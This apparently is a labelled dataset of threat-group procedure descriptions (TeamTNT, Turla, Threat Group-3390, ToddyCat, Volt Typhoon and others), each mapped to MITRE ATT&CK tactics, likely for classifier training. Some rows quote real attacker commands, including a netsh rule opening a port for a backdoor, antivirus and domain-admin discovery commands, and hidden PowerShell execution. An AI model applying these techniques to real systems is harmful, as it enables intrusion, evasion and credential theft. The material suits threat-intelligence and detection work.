TeamTNT has used a payload that removes itself after running. TeamTNT also has deleted locally staged files for collecting credentials or scan results for local IP addresses after exfiltrating them.,['TA0005:Defense Evasion']
TeamTNT has used a script that checks `/proc/*/environ` for environment variables related to AWS.,['TA0007:Discovery']
TeamTNT has the curl and wget commands as well as batch scripts to download new tools.,['TA0011:Command and Control']
TeamTNT has modified the permissions on binaries with chattr.,['TA0005:Defense Evasion']
TeamTNT has created local privileged users on victim machines.,['TA0003:Persistence']
TeamTNT has aggregated collected credentials in text files before exfiltrating.,['TA0009:Collection']
TeamTNT has relied on users to download and execute malicious Docker images.,['TA0002:Execution']
TeamTNT has developed custom malware such as Hildegard.,['TA0042:Resource Development']
TeamTNT has disguised their scripts with docker-related file names.,['TA0005:Defense Evasion']
TeamTNT has replaced .dockerd and .dockerenv with their own scripts and cryptocurrency mining software.,['TA0005:Defense Evasion']
TeamTNT has used masscan to search for open Docker API ports and Kubernetes clusters. TeamTNT has also used malware that utilizes zmap and zgrab to search for vulnerable services in cloud environments.,['TA0007:Discovery']
TeamTNT has searched for attached VGA devices using lspci.,['TA0007:Discovery']
TeamTNT has executed PowerShell commands in batch scripts.,['TA0002:Execution']
TeamTNT has searched for unsecured SSH keys.,['TA0006:Credential Access']
TeamTNT has searched for rival malware and removes it if found. TeamTNT has also searched for running processes containing the strings aliyun or liyun to identify machines running Alibaba Cloud Security tools.,['TA0007:Discovery']
TeamTNT has added batch scripts to the startup folder.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
TeamTNT has established tmate sessions for C2 communications.,['TA0011:Command and Control']
TeamTNT has used rootkits such as the open-source Diamorphine rootkit and their custom bots to hide cryptocurrency mining activities on the machine.,['TA0005:Defense Evasion']
TeamTNT has used SSH to connect back to victim machines. TeamTNT has also used SSH to transfer tools and payloads onto victim hosts and execute them.,['TA0008:Lateral Movement']
TeamTNT has added RSA keys in authorized_keys.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
TeamTNT has scanned specific lists of target IP addresses.,['TA0043:Reconnaissance']
TeamTNT has searched for security products on infected machines.,['TA0007:Discovery']
TeamTNT has used UPX and Ezuri packer to pack its binaries.,['TA0005:Defense Evasion']
"TeamTNT has searched for system version, architecture, disk partition, logical volume, and hostname information.",['TA0007:Discovery']
TeamTNT has enumerated the host machine’s IP address.,['TA0007:Discovery']
TeamTNT has run netstat -anp to search for rival malware connections. TeamTNT has also used `libprocesshider` to modify /etc/ld.so.preload.,['TA0007:Discovery']
TeamTNT has searched for services such as Alibaba Cloud Security's aliyun service and BMC Helix Cloud Security's bmc-agent service in order to disable them.,['TA0007:Discovery']
TeamTNT has created system services to execute cryptocurrency mining software.,['TA0002:Execution']
TeamTNT has established persistence through the creation of a cryptocurrency mining system service using systemctl.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
TeamTNT has used shell scripts for execution.,['TA0002:Execution']
TeamTNT has uploaded backdoored Docker images to Docker Hub.,['TA0042:Resource Development']
TeamTNT has scanned for vulnerabilities in IoT devices and other related resources such as the Docker API.,['TA0043:Reconnaissance']
TeamTNT has the `curl` command to send credentials over HTTP and the `curl` and `wget` commands to download new software. TeamTNT has also used a custom user agent HTTP header in shell scripts.,['TA0011:Command and Control']
TeamTNT has leveraged iplogger.org to send collected data back to C2.,['TA0011:Command and Control']
TeamTNT has used batch scripts to download tools and executing cryptocurrency miners.,['TA0002:Execution']
TeamTNT has used malware that adds cryptocurrency miners as a service.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
The White Company has taken advantage of a known vulnerability in Microsoft Word to execute code.,['TA0002:Execution']
The White Company has the ability to delete its malware entirely from the target system.,['TA0005:Defense Evasion']
The White Company has used phishing lure documents that trick users into opening them and infecting their computers.,['TA0002:Execution']
"The White Company has checked for specific antivirus products on the target’s computer, including Kaspersky, Quick Heal, AVG, BitDefender, Avira, Sophos, Avast!, and ESET.",['TA0007:Discovery']
The White Company has obfuscated their payloads through packing.,['TA0005:Defense Evasion']
The White Company has sent phishing emails with malicious Microsoft Word attachments to victims.,['TA0001:Initial Access']
The White Company has checked the current date on the victim system.,['TA0007:Discovery']
"Threat Group-1314 actors used compromised domain credentials for the victim's endpoint management platform, Altiris, to move laterally.","['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Threat Group-1314 actors mapped network drives using net use.,['TA0008:Lateral Movement']
"Threat Group-1314 actors used a victim's endpoint management platform, Altiris, for lateral movement.","['TA0002:Execution', 'TA0008:Lateral Movement']"
Threat Group-1314 actors spawned shells on remote systems on a victim network to execute commands.,['TA0002:Execution']
"Threat Group-3390 has used RAR to compress, encrypt, and password-protect files prior to exfiltration.",['TA0009:Collection']
"Threat Group-3390 actors use at to schedule tasks to run self-extracting RAR archives, which install HTTPBrowser or PlugX on other victims on a network.","['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Threat Group-3390 ran a command to compile an archive of file types of interest from the victim user's directories.,['TA0009:Collection']
A Threat Group-3390 tool can use a public UAC bypass method to elevate privileges.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
"Threat Group-3390 has obtained stolen valid certificates, including from VMProtect and the Chinese instant messaging application Youdu, for their operations.",['TA0042:Resource Development']
Threat Group-3390 has compromised the Able Desktop installer to gain access to victim's environments.,['TA0001:Initial Access']
Threat Group-3390 has performed DLL search order hijacking to execute their payload.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
"Threat Group-3390 has used DLL side-loading, including by using legitimate Kaspersky antivirus variants as well as `rc.exe`, a legitimate Microsoft Resource Compiler.","['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Threat Group-3390 actors have split RAR files for exfiltration into parts.,['TA0010:Exfiltration']
Threat Group-3390 ran a command to compile an archive of file types of interest from the victim user's directories.,['TA0009:Collection']
"During execution, Threat Group-3390 malware deobfuscates and decompresses code that was encoded with Metasploit’s shikata_ga_nai encoder as well as compressed with LZNT1 compression.",['TA0005:Defense Evasion']
Threat Group-3390 has used appcmd.exe to disable logging on a victim server.,['TA0005:Defense Evasion']
Threat Group-3390 has registered domains for C2.,['TA0042:Resource Development']
Threat Group-3390 has extensively used strategic web compromises to target victims.,['TA0001:Initial Access']
Threat Group-3390 has embedded malicious code into websites to screen a potential victim's IP address and then exploit their browser if they are of interest.,['TA0042:Resource Development']
A Threat Group-3390 tool can encrypt payloads using XOR. Threat Group-3390 malware is also obfuscated using Metasploit’s shikata_ga_nai encoder as well as compressed with LZNT1 compression.,['TA0005:Defense Evasion']
Threat Group-3390 has exfiltrated stolen data to Dropbox.,['TA0010:Exfiltration']
"Threat Group-3390 has exploited the Microsoft SharePoint vulnerability CVE-2019-0604 and CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065 in Exchange Server.",['TA0001:Initial Access']
Threat Group-3390 has exploited CVE-2018-0798 in Equation Editor.,['TA0002:Execution']
Threat Group-3390 has used CVE-2014-6324 and CVE-2017-0213 to escalate privileges.,['TA0004:Privilege Escalation']
Threat Group-3390 has exploited MS17-010 to move laterally to other systems on the network.,['TA0008:Lateral Movement']
Threat Group-3390 actors look for and use VPN profiles during an operation to access the network using external VPN services. Threat Group-3390 has also obtained OWA account credentials during intrusions that it subsequently used to attempt to regain access when evicted from a victim network.,"['TA0001:Initial Access', 'TA0003:Persistence']"
Threat Group-3390 has deleted existing logs and exfiltrated file archives from a victim.,['TA0005:Defense Evasion']
"Threat Group-3390 has downloaded additional malware and tools, including through the use of `certutil`, onto a compromised host .",['TA0011:Command and Control']
"Threat Group-3390 actors installed a credential logger on Microsoft Exchange servers. Threat Group-3390 also leveraged the reconnaissance framework, ScanBox, to capture keystrokes.","['TA0009:Collection', 'TA0006:Credential Access']"
Threat Group-3390 actors have used gsecdump to dump credentials. They have also dumped credentials from domain controllers.,['TA0006:Credential Access']
Threat Group-3390 actors have used a modified version of Mimikatz called Wrapikatz to dump credentials. They have also dumped credentials from domain controllers.,['TA0006:Credential Access']
Threat Group-3390 has used net user to conduct internal discovery of systems.,['TA0007:Discovery']
Threat Group-3390 has locally staged encrypted archives for later exfiltration efforts.,['TA0009:Collection']
Threat Group-3390 has lured victims into opening malicious files containing malware.,['TA0002:Execution']
A Threat Group-3390 tool has created new Registry keys under `HKEY_CURRENT_USER\Software\Classes\` and `HKLM\SYSTEM\CurrentControlSet\services`.,['TA0005:Defense Evasion']
Threat Group-3390 actors use the Hunter tool to conduct network service discovery for vulnerable systems.,['TA0007:Discovery']
"Threat Group-3390 has detached network shares after exfiltrating files, likely to evade detection.",['TA0005:Defense Evasion']
Threat Group-3390 obtained a KeePass database from a compromised host.,['TA0006:Credential Access']
Threat Group-3390 has used PowerShell for execution.,['TA0002:Execution']
A Threat Group-3390 tool can spawn `svchost.exe` and inject the payload into that process.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
A Threat Group-3390 tool can read and decrypt stored Registry values.,['TA0007:Discovery']
Threat Group-3390's malware can add a Registry key to `Software\Microsoft\Windows\CurrentVersion\Run` for persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Threat Group-3390 has moved staged encrypted archives to Internet-facing servers that had previously been compromised with China Chopper prior to exfiltration.,['TA0009:Collection']
Threat Group-3390 has used the net view command.,['TA0007:Discovery']
Threat Group-3390 actors have used gsecdump to dump credentials. They have also dumped credentials from domain controllers.,['TA0006:Credential Access']
"Threat Group-3390 has packed malware and tools, including using VMProtect.",['TA0005:Defense Evasion']
Threat Group-3390 has used e-mail to deliver malicious attachments to victims.,['TA0001:Initial Access']
Threat Group-3390 actors use NBTscan to discover vulnerable systems.,['TA0007:Discovery']
Threat Group-3390 has used `net use` and `netstat` to conduct internal discovery of systems. The group has also used `quser.exe` to identify existing RDP sessions on a victim.,['TA0007:Discovery']
Threat Group-3390 has used `whoami` to collect system user information.,['TA0007:Discovery']
"Threat Group-3390 has obtained and used tools such as Impacket, pwdump, Mimikatz, gsecdump, NBTscan, and Windows Credential Editor.",['TA0042:Resource Development']
Threat Group-3390 has compromised third party service providers to gain access to victim's environments.,['TA0001:Initial Access']
Threat Group-3390 has hosted malicious payloads on Dropbox.,['TA0042:Resource Development']
"Threat Group-3390 has staged tools, including gsecdump and WCE, on previously compromised websites.",['TA0042:Resource Development']
Threat Group-3390 actors obtain legitimate credentials using a variety of methods and use them to further lateral movement on victim networks.,"['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Threat Group-3390 malware has used HTTP for C2.,['TA0011:Command and Control']
Threat Group-3390 has used a variety of Web shells.,['TA0003:Persistence']
Threat Group-3390 has used command-line interfaces for execution.,['TA0002:Execution']
A Threat Group-3390 tool can use WMI to execute a binary.,['TA0002:Execution']
Threat Group-3390 has used WinRM to enable remote execution.,['TA0008:Lateral Movement']
"Threat Group-3390's malware can create a new service, sometimes naming it after the config information, to gain persistence.","['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Thrip has used WinSCP to exfiltrate data from a targeted organization over FTP.,['TA0010:Exfiltration']
"Thrip leveraged PowerShell to run commands to download payloads, traverse the compromised networks, and carry out reconnaissance.",['TA0002:Execution']
Thrip used a cloud-based remote access software called LogMeIn for their attacks.,['TA0011:Command and Control']
Thrip has obtained and used tools such as Mimikatz and PsExec.,['TA0042:Resource Development']
"ToddyCat has leveraged xcopy, 7zip, and RAR to stage and compress collected documents prior to exfiltration.",['TA0009:Collection']
ToddyCat has run scripts to collect documents from targeted hosts.,['TA0009:Collection']
"Prior to executing a backdoor ToddyCat has run `cmd /c start /b netsh advfirewall firewall add rule name=""SGAccessInboundRule"" dir=in protocol=udp action=allow localport=49683` to allow the targeted system to receive UDP packets on port 49683.",['TA0005:Defense Evasion']
ToddyCat has run `net user %USER% /dom` for account discovery.,['TA0007:Discovery']
ToddyCat has used compromised domain admin credentials to mount local network shares.,"['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
"ToddyCat has executed `net group ""domain admins"" /dom` for discovery on compromised machines.",['TA0007:Discovery']
ToddyCat has used a DropBox uploader to exfiltrate stolen files.,['TA0010:Exfiltration']
ToddyCat has exploited the ProxyLogon vulnerability to compromise Exchange Servers at multiple organizations.,['TA0001:Initial Access']
"ToddyCat has run scripts to enumerate recently modified documents having either a .pdf, .doc, .docx, .xls or .xlsx extension.",['TA0007:Discovery']
ToddyCat has hidden malicious scripts using `powershell.exe -windowstyle hidden`.,['TA0005:Defense Evasion']
ToddyCat has used the name `debug.exe` for malware components.,['TA0005:Defense Evasion']
ToddyCat has used `WinExec` to execute commands received from C2 on compromised hosts.,['TA0002:Execution']
ToddyCat has used a passive backdoor that receives commands with UDP packets.,['TA0011:Command and Control']
ToddyCat has used Powershell scripts to perform post exploit collection.,['TA0002:Execution']
ToddyCat has run `cmd /c start /b tasklist` to enumerate processes.,['TA0007:Discovery']
ToddyCat manually transferred collected files to an exfiltration host using xcopy.,['TA0009:Collection']
ToddyCat has used `ping %REMOTE_HOST%` for post exploit discovery.,['TA0007:Discovery']
ToddyCat has used locally mounted network shares for lateral movement through targated environments.,['TA0008:Lateral Movement']
ToddyCat has used scheduled tasks to execute discovery commands and scripts for collection.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
"ToddyCat can determine is Kaspersky software is running on an endpoint by running `cmd /c wmic process where name=""avp.exe""`.",['TA0007:Discovery']
ToddyCat has sent loaders configured to run Ninja as zip archives via Telegram.,['TA0001:Initial Access']
"ToddyCat has collected information on bootable drives including model, vendor, and serial numbers.",['TA0007:Discovery']
ToddyCat has used `netstat -anop tcp` to discover TCP connections to compromised hosts.,['TA0007:Discovery']
ToddyCat has used .bat scripts and `cmd` for execution on compromised hosts.,['TA0002:Execution']
ToddyCat has used WMI to execute scripts for post exploit document collection.,['TA0002:Execution']
Tonto Team abuses a legitimate and signed Microsoft executable to launch a malicious DLL.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
"Tonto Team has exploited Microsoft vulnerabilities, including CVE-2018-0798, CVE-2018-8174, CVE-2018-0802, CVE-2017-11882, CVE-2019-9489 CVE-2020-8468, and CVE-2018-0798 to enable execution of their delivered malicious payloads.",['TA0002:Execution']
Tonto Team has exploited CVE-2019-0803 and MS16-032 to escalate privileges.,['TA0004:Privilege Escalation']
Tonto Team has used EternalBlue exploits for lateral movement.,['TA0008:Lateral Movement']
Tonto Team has routed their traffic through an external server in order to obfuscate their location.,['TA0011:Command and Control']
Tonto Team has downloaded malicious DLLs which served as a ShadowPad loader.,['TA0011:Command and Control']
Tonto Team has used keylogging tools in their operations.,"['TA0009:Collection', 'TA0006:Credential Access']"
"Tonto Team has used the ShowLocalGroupDetails command to identify administrator, user, and guest accounts on a compromised host.",['TA0007:Discovery']
Tonto Team has relied on user interaction to open their malicious RTF documents.,['TA0002:Execution']
Tonto Team has used tools such as NBTscan to enumerate network shares.,['TA0007:Discovery']
Tonto Team has used a variety of credential dumping tools.,['TA0006:Credential Access']
Tonto Team has used PowerShell to download additional payloads.,['TA0002:Execution']
Tonto Team has used Python-based tools for execution.,['TA0002:Execution']
Tonto Team has delivered payloads via spearphishing attachments.,['TA0001:Initial Access']
Tonto Team has used a first stage web shell after compromising a vulnerable Exchange server.,['TA0003:Persistence']
"Transparent Tribe has registered domains to mimic file sharing, government, defense, and research websites for use in targeted campaigns.",['TA0042:Resource Development']
Transparent Tribe has compromised domains for use in targeted malicious campaigns.,['TA0042:Resource Development']
"Transparent Tribe has used websites with malicious hyperlinks and iframes to infect targeted victims with Crimson, njRAT, and other malicious tools.",['TA0001:Initial Access']
"Transparent Tribe has set up websites with malicious hyperlinks and iframes to infect targeted victims with Crimson, njRAT, and other malicious tools.",['TA0042:Resource Development']
Transparent Tribe has used dynamic DNS services to set up C2.,['TA0011:Command and Control']
Transparent Tribe has dropped encoded executables on compromised hosts.,['TA0005:Defense Evasion']
Transparent Tribe has crafted malicious files to exploit CVE-2012-0158 and CVE-2010-3333 for execution.,['TA0002:Execution']
Transparent Tribe can hide legitimate directories and replace them with malicious copies of the same name.,['TA0005:Defense Evasion']
Transparent Tribe has used weaponized documents in e-mail to compromise targeted systems.,['TA0002:Execution']
Transparent Tribe has directed users to open URLs hosting malicious content.,['TA0002:Execution']
Transparent Tribe can mimic legitimate Windows directories by using the same icons and names.,['TA0005:Defense Evasion']
Transparent Tribe has sent spearphishing e-mails with attachments to deliver malicious payloads.,['TA0001:Initial Access']
Transparent Tribe has embedded links to malicious downloads in e-mails.,['TA0001:Initial Access']
Transparent Tribe has crafted VBS-based malicious documents.,['TA0002:Execution']
Tropic Trooper has used SSL to connect to C2 servers.,['TA0011:Command and Control']
Tropic Trooper has collected information automatically using the adversary's USBferry attack.,['TA0009:Collection']
Tropic Trooper has used a copy function to automatically exfiltrate sensitive data from air-gapped systems using USB storage.,['TA0010:Exfiltration']
Tropic Trooper has been known to side-load DLLs using a valid version of a Windows Address Book and Windows Defender executable with one of their tools.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Tropic Trooper's backdoor has communicated to the C2 over the DNS protocol.,['TA0011:Command and Control']
Tropic Trooper used shellcode with an XOR algorithm to decrypt a payload. Tropic Trooper also decrypted image files which contained a payload.,['TA0005:Defense Evasion']
Tropic Trooper has injected a DLL backdoor into dllhost.exe and svchost.exe.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Tropic Trooper has encrypted traffic with the C2 to prevent network detection.,['TA0011:Command and Control']
Tropic Trooper has encrypted configuration files.,['TA0005:Defense Evasion']
Tropic Trooper has exfiltrated data using USB storage devices.,['TA0010:Exfiltration']
"Tropic Trooper has executed commands through Microsoft security vulnerabilities, including CVE-2017-11882, CVE-2018-0802, and CVE-2012-0158.",['TA0002:Execution']
Tropic Trooper has deleted dropper files on an infected system using command scripts.,['TA0005:Defense Evasion']
Tropic Trooper has monitored files' modified time.,['TA0007:Discovery']
Tropic Trooper has created a hidden directory under C:\ProgramData\Apple\Updates\ and C:\Users\Public\Documents\Flash\.,['TA0005:Defense Evasion']
Tropic Trooper has used a delivered trojan to download additional files.,['TA0011:Command and Control']
Tropic Trooper has used known administrator account credentials to execute the backdoor directly.,"['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Tropic Trooper has lured victims into executing malware via malicious e-mail attachments.,['TA0002:Execution']
Tropic Trooper has hidden payloads in Flash directories and fake installer files.,['TA0005:Defense Evasion']
"Tropic Trooper has used multiple Windows APIs including HttpInitialize, HttpCreateHttpHandle, and HttpAddUrl.",['TA0002:Execution']
Tropic Trooper used pr and an openly available tool to scan for open ports on target systems.,['TA0007:Discovery']
Tropic Trooper used netview to scan target systems for shared resources.,['TA0007:Discovery']
Tropic Trooper is capable of enumerating the running processes on the system using pslist.,['TA0007:Discovery']
Tropic Trooper has created shortcuts in the Startup folder to establish persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Tropic Trooper has attempted to transfer USBferry from an infected USB device by copying an Autorun function to the target machine.,"['TA0001:Initial Access', 'TA0008:Lateral Movement']"
Tropic Trooper can search for anti-virus software running on the system.,['TA0007:Discovery']
Tropic Trooper's backdoor could list the infected system's installed software.,['TA0007:Discovery']
Tropic Trooper sent spearphishing emails that contained malicious Microsoft Office and fake installer file attachments.,['TA0001:Initial Access']
Tropic Trooper has used base64 encoding to hide command strings delivered from the C2.,['TA0011:Command and Control']
Tropic Trooper has used JPG files with encrypted payloads to mask their backdoor routines and evade detection.,['TA0005:Defense Evasion']
Tropic Trooper has detected a target system’s OS version and system volume information.,['TA0007:Discovery']
Tropic Trooper has used scripts to collect the host's network topology.,['TA0007:Discovery']
Tropic Trooper has tested if the localhost network is available and other connection capability on an infected system using command scripts.,['TA0007:Discovery']
Tropic Trooper used letmein to scan for saved usernames on the target system.,['TA0007:Discovery']
"Tropic Trooper delivered malicious documents with the XLSX extension, typically used by OpenXML documents, but the file itself was actually an OLE document.",['TA0005:Defense Evasion']
Tropic Trooper has used HTTP in communication with the C2.,['TA0011:Command and Control']
"Tropic Trooper has started a web service in the target host and wait for the adversary to connect, acting as a web shell.",['TA0003:Persistence']
Tropic Trooper has used Windows command scripts.,['TA0002:Execution']
Tropic Trooper has installed a service pointing to a malicious DLL dropped to disk.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Tropic Trooper has created the Registry key HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell and sets the value to establish persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Turla has encrypted files stolen from connected USB drives into a RAR file before exfiltration.,['TA0009:Collection']
A Turla JavaScript backdoor has used Google Apps Script as its C2 server.,['TA0011:Command and Control']
Turla may attempt to connect to systems within a victim's network using net use commands and a predefined list or collection of passwords.,['TA0006:Credential Access']
Turla has modified variables in kernel memory to turn off Driver Signature Enforcement after exploiting vulnerabilities that obtained kernel mode privileges.,['TA0005:Defense Evasion']
"Turla has used encryption 's Out-EncryptedScript.ps1), random variable names, and base64 encoding to obfuscate PowerShell commands and payloads.",['TA0005:Defense Evasion']
Turla RPC backdoors can impersonate or steal process tokens before executing commands.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Turla has used a custom .NET tool to collect documents from an organization's internal central database.,['TA0009:Collection']
Turla RPC backdoors can upload files from victim machines.,['TA0009:Collection']
Turla RPC backdoors can collect files from USB thumb drives.,['TA0009:Collection']
"Turla has used a custom decryption routine, which pulls key and salt values from other artifacts such as a WMI filter or PowerShell Profile, to decode encrypted PowerShell payloads.",['TA0005:Defense Evasion']
"Turla has used a AMSI bypass, which patches the in-memory amsi.dll, in PowerShell scripts to bypass Windows antimalware products.",['TA0005:Defense Evasion']
Turla has used net user /domain to enumerate domain accounts.,['TA0007:Discovery']
"Turla has used net group ""Domain Admins"" /domain to identify domain administrators.",['TA0007:Discovery']
Turla has infected victims using watering holes.,['TA0001:Initial Access']
Turla has used Metasploit to perform reflective DLL injection in order to escalate privileges.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Turla has used WebDAV to upload stolen USB files to a cloud drive. Turla has also exfiltrated stolen files to OneDrive and 4shared.,['TA0010:Exfiltration']
Turla has exploited vulnerabilities in the VBoxDrv.sys driver to obtain kernel mode privileges.,['TA0004:Privilege Escalation']
"Turla surveys a system upon check-in to discover files in specific locations on the hard disk %TEMP% directory, the current user's desktop, the Program Files directory, and Recent. Turla RPC backdoors have also searched for files matching the lPH*.dll pattern.",['TA0007:Discovery']
Turla has placed LunarWeb install files into directories that are excluded from scanning.,['TA0005:Defense Evasion']
Turla has used the Registry to store encrypted and encoded payloads.,['TA0005:Defense Evasion']
Turla surveys a system upon check-in to discover Group Policy details using the gpresult command.,['TA0007:Discovery']
"Based on comparison of Gazer versions, Turla made an effort to obfuscate strings in the malware that could be used as IoCs, including the mutex name and named pipe.",['TA0005:Defense Evasion']
Turla has used shellcode to download Meterpreter after compromising a victim.,['TA0011:Command and Control']
Turla has compromised internal network systems to act as a proxy to forward traffic to C2.,['TA0011:Command and Control']
Turla has used tracert to check internet connectivity.,['TA0007:Discovery']
Turla has used various JavaScript-based backdoors.,['TA0002:Execution']
Turla RPC backdoors can be used to transfer files to/from victim machines on the local network.,['TA0008:Lateral Movement']
Turla has used net user to enumerate local accounts on the system.,['TA0007:Discovery']
Turla has abused local accounts that have the same password across the victim’s network.,"['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
"Turla has used net localgroup and net localgroup Administrators to enumerate group information, including members of the local administrators group.",['TA0007:Discovery']
Turla has used multiple backdoors which communicate with a C2 server via email attachments.,['TA0011:Command and Control']
Turla has used spearphishing via a link to get users to download and run their malware.,['TA0002:Execution']
Turla has developed its own unique malware for use in operations.,['TA0042:Resource Development']
"Turla has used malware obtained after compromising other threat actors, such as OilRig.",['TA0042:Resource Development']
Turla has named components of LunarWeb to mimic Zabbix agent logs.,['TA0005:Defense Evasion']
Turla has modified Registry values to store payloads.,['TA0005:Defense Evasion']
Turla and its RPC backdoors have used APIs calls for various tasks related to subverting AMSI and accessing then executing commands through RPC and/or named pipes.,['TA0002:Execution']
Turla has used net accounts and net accounts /domain to acquire password policy information.,['TA0007:Discovery']
Turla has used fsutil fsinfo drives to list connected drives.,['TA0007:Discovery']
"Turla has used PowerShell to execute commands/scripts, in some cases via a custom executable or code from Empire's PSInject. Turla has also used PowerShell scripts to load and execute malware in memory.",['TA0002:Execution']
Turla has used PowerShell profiles to maintain persistence on an infected machine.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Turla surveys a system upon check-in to discover running processes using the tasklist /v command. Turla RPC backdoors have also enumerated processes associated with specific open ports or named pipes.,['TA0007:Discovery']
Turla has also used PowerSploit's Invoke-ReflectivePEInjection.ps1 to reflectively load a PowerShell payload into a random process on the victim system.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Turla RPC backdoors have included local UPnP RPC proxies.,['TA0011:Command and Control']
Turla has used IronPython scripts as part of the IronNetInjector toolchain to drop payloads.,['TA0002:Execution']
Turla surveys a system upon check-in to discover information in the Windows Registry with the reg query command. Turla has also retrieved PowerShell payloads hidden in Registry keys as well as checking keys associated with null session named pipes .,['TA0007:Discovery']
"A Turla Javascript backdoor added a local_update_check value under the Registry key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run to establish persistence. Additionally, a Turla custom executable containing Metasploit shellcode is saved to the Startup folder to gain persistence.","['TA0003:Persistence', 'TA0004:Privilege Escalation']"
"Turla surveys a system upon check-in to discover remote systems on a local network using the net view and net view /DOMAIN commands. Turla has also used net group ""Domain Computers"" /domain, net group ""Domain Controllers"" /domain, and net group ""Exchange Servers"" /domain to enumerate domain computers, including the organization's DC and Exchange Server.",['TA0007:Discovery']
Turla used net use commands to connect to lateral systems within a network.,['TA0008:Lateral Movement']
"Turla has obtained information on security software, including security logging information that may indicate whether their malware has been detected.",['TA0007:Discovery']
Turla has used compromised servers as infrastructure.,['TA0042:Resource Development']
Turla attempted to trick targets into clicking on a link featuring a seemingly legitimate domain from Adobe.com to download their malware and gain initial access.,['TA0001:Initial Access']
Turla surveys a system upon check-in to discover operating system configuration details using the systeminfo and set commands.,['TA0007:Discovery']
"Turla surveys a system upon check-in to discover network configuration details using the arp -a, nbtstat -n, net config, ipconfig /all, and route commands, as well as NBTscan. Turla RPC backdoors have also retrieved registered RPC interface information from process memory.",['TA0007:Discovery']
"Turla surveys a system upon check-in to discover active local network connections using the netstat -an, net use, net file, and net session commands. Turla RPC backdoors have also enumerated the IPv4 TCP connection table via the GetTcpTable2 API call.",['TA0007:Discovery']
Turla surveys a system upon check-in to discover running services and associated processes using the tasklist /svc command.,['TA0007:Discovery']
Turla surveys a system upon check-in to discover the system time by using the net time command.,['TA0007:Discovery']
Turla has obtained and customized publicly-available tools like Mimikatz.,['TA0042:Resource Development']
Turla has used the VPS infrastructure of compromised Iranian threat actors.,['TA0042:Resource Development']
Turla has used VBS scripts throughout its operations.,['TA0002:Execution']
Turla has used HTTP and HTTPS for C2 communications.,['TA0011:Command and Control']
"Turla has used legitimate web services including Pastebin, Dropbox, and GitHub for C2 communications.",['TA0011:Command and Control']
Turla has created web accounts including Dropbox and GitHub for C2 and document exfiltration.,['TA0042:Resource Development']
Turla has frequently used compromised WordPress sites for C2 infrastructure.,['TA0042:Resource Development']
Turla RPC backdoors have used cmd.exe to execute commands.,['TA0002:Execution']
Turla has gathered credentials from the Windows Credential Manager tool.,['TA0006:Credential Access']
Turla has used WMI event filters and consumers to establish persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Turla established persistence by adding a Shell value under the Registry key HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
"Volatile Cedar has targeted publicly facing web servers, with both automatic and manual vulnerability discovery.",['TA0001:Initial Access']
Volatile Cedar can deploy additional tools.,['TA0011:Command and Control']
Volatile Cedar has performed vulnerability scans of the target server.,['TA0043:Reconnaissance']
Volatile Cedar can inject web shell code into a server.,['TA0003:Persistence']
Volatile Cedar has used DirBuster and GoBuster to brute force web directories and DNS subdomains.,['TA0043:Reconnaissance']
Volt Typhoon has collected window title information from compromised systems.,['TA0007:Discovery']
Volt Typhoon has archived the ntds.dit database as a multi-volume password-protected archive with 7-Zip.,['TA0009:Collection']
Volt Typhoon Volt Typhoon has used compromised Cisco and NETGEAR end-of-life SOHO routers implanted with KV Botnet malware to support operations.,['TA0042:Resource Development']
Volt Typhoon has targeted the browsing history of network administrators.,['TA0007:Discovery']
Volt Typhoon has inspected server logs to remove their IPs.,['TA0005:Defense Evasion']
"Volt Typhoon has selectively cleared Windows Event Logs, system logs, and other technical artifacts to remove evidence of intrusion activity.",['TA0005:Defense Evasion']
"Volt Typhoon has attempted to obtain credentials from OpenSSH, realvnc, and PuTTY.",['TA0006:Credential Access']
Volt Typhoon has targeted network administrator browser data including browsing history and stored credentials.,['TA0006:Credential Access']
Volt Typhoon has staged collected data in password-protected archives.,['TA0009:Collection']
"Volt Typhoon has stolen files from a sensitive file server and the Active Directory database from targeted environments, and used Wevtutil to extract event log information.",['TA0009:Collection']
Volt Typhoon has executed the Windows-native `vssadmin` command to create volume shadow copies.,['TA0005:Defense Evasion']
"Volt Typhoon has run `net group /dom` and `net group ""Domain Admins"" /dom` in compromised environments for account discovery.",['TA0007:Discovery']
